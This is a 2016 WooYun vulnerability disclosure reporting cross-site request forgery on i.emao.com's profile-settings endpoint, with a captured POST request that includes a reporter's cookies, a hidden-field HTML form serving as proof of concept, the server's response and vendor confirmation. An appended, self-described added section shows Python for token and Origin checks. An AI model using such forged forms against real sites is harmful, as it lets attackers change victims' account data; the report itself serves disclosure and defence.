
Vulnerability summary

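Bug ID: wooyun-2016-0167813

Title: CSRF on 一猫汽车网 allows modifying other users' information

Vendor: 北京一猫汽车科技有限公司

Author: 路人甲

Submitted: 2016-01-07 13:46

Fixed: 2016-02-22 16:48

Published: 2016-02-22 16:48

Vulnerability type: CSRF

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]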



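Vulnerability details

Disclosure status:

2016-01-07: Details reported to the vendor; awaiting vendor handling
2016-01-09: Vendor confirmed; details disclosed to the vendor only
2016-01-19: Details disclosed to core white hats and experts in related fields
2016-01-29: Details disclosed to regular white hats
2016-02-08: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public

Brief description:

CSRF on 一猫汽车网 allows modifying other users' information

Detailed description: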



POST /homecp/user/dosetting HTTP/1.1
Host: i.emao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://i.emao.com/homecp/user/userinfo
Content-Length: 77
Cookie: Hm_lvt_c8553bf999297be4b7c3bf2ffec7c37f=1452005234,1452008006,1452055085,1452061634; _ga=GA1.2.816849709.1452005234; city_id=1; city_name=%E5%8C%97%E4%BA%AC; province_id=1; homePageCityId=1; homePageCityName=%E5%8C%97%E4%BA%AC; homePageCityPinYin=beijing; city_pinYin=beijing; _jzqa=1.3467950360625069000.1452006254.1452006254.1452055129.2; _jzqx=1.1452006254.1452055129.1.jzqsr=emao%2Ecom|jzqct=/.-; _jzqckmp=1; _qzja=1.1304430587.1452006253793.1452006253794.1452055129308.1452060788956.1452061074999.0.0.0.48.2; _qzjb=1.1452055129308.46.0.0.0; _qzjto=46.1.0; _jzqb=1.42.10.1452055129.1; sO3A_43cb_lastvisit=1452051783; sO3A_43cb_ulastactivity=1452059374%7C0; sO3A_43cb_lastact=1452061753%09index.php%09; mall_cityId=1; vacolide=m6uYoQ%3D%3D; sO3A_43cb_saltkey=Fd746Fh5; BAIDU_DUP_lcr=http://www.wooyun.org/corps/%E5%8C%97%E4%BA%AC%E4%B8%80%E7%8C%AB%E6%B1%BD%E8%BD%A6%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8; Hm_lpvt_c8553bf999297be4b7c3bf2ffec7c37f=1452061985; _gat=1; EMAOSSID=4120p570s890musk9rps3iljg0; EMUSS=n52emKCWng%3D%3D; EMUSE=pZ6graWl; sO3A_43cb_auth=96d6Ahb37eXVehfpHgOeRpCc5RccR37H%2BQcXRyPIHv1Dh%2BDqdPTpCBxmWFTDVcLmCfeotahQB9kWa9sVRyNxD%2BZge%2BQ
Connection: keep-alive

nickname=eeeeeeeeq&sex=1&year=&month=&day=&provinceid=&cityid=&areaid=&major=

<html>
<body>
<form action="http://i.emao.com/homecp/user/dosetting" method="POST">
<input type="hidden" name="nickname" value="eeeeeeeeq" />
<input type="hidden" name="sex" value="1" />
<input type="hidden" name="year" value="" />
<input type="hidden" name="month" value="" />
<input type="hidden" name="day" value="" />
<input type="hidden" name="provinceid" value="" />
<input type="hidden" name="cityid" value="" />
<input type="hidden" name="areaid" value="" />
<input type="hidden" name="major" value="" />

<input type="submit" value="Submit request" />
</form>
</body>
</html>


{"code":0,"msg":"ok","data":{"uid":"117180","currentpage":"i.emao.com\/homecp\/user\/dosetting","loginuserid":"117180"}}

Proof of vulnerability:


Fix:

You are more professional at this than I am.

Copyright notice: please credit the source when reposting: 路人甲@乌云
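
The request in the report carries only profile fields and cookies, with no per-session token, which is why a form on another site can replay it. The following is an added example, not part of the original report and not the vendor's code: a server-side check for a state-changing POST that combines an Origin/Referer comparison with a session-bound token. The secret, the `csrf_token` field name, the session id and `other-site.example` are assumptions made for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SECRET = b"constructed-demo-secret"        # assumption: server-side secret key
TRUSTED_ORIGINS = {"http://i.emao.com"}    # origin of the profile page in the report
TOKEN_FIELD = "csrf_token"                 # hypothetical field name, not the site's


def issue_token(session_id):
    """Token bound to one session; the server embeds it in its own profile form."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def source_origin(headers):
    """scheme://host of the sending page, from Origin or else Referer (None if absent)."""
    value = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def check_post(headers, form, session_id):
    """Return (allowed, reason) for a state-changing POST such as /homecp/user/dosetting."""
    origin = source_origin(headers)
    if origin is not None and origin not in TRUSTED_ORIGINS:
        return False, "cross-site origin"
    # Headers can be absent (Referer stripped), so the token is the deciding check.
    supplied = form.get(TOKEN_FIELD, "").encode()
    if not hmac.compare_digest(supplied, issue_token(session_id).encode()):
        return False, "missing or invalid token"
    return True, "ok"


def demo():
    sid = "constructed-session-id"         # constructed, not a cookie from the report
    body = {"nickname": "eeeeeeeeq", "sex": "1"}   # abridged body from the report
    same_site = {"Referer": "http://i.emao.com/homecp/user/userinfo"}
    return [
        check_post(same_site, body, sid),                                # request as captured
        check_post({"Origin": "http://other-site.example"}, body, sid),  # form hosted elsewhere
        check_post({}, body, sid),                                       # Referer suppressed
        check_post(same_site, {**body, TOKEN_FIELD: issue_token(sid)}, sid),
    ]


if __name__ == "__main__":
    for allowed, reason in demo():
        print(allowed, reason)
```

Only the last case, a same-site request carrying the token issued for that session, is accepted; the captured request itself is rejected because it has no token.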


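Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2016-01-09 21:32

Vendor reply:

Thank you for helping us find so many problems; we will thank you properly!

Latest status:

None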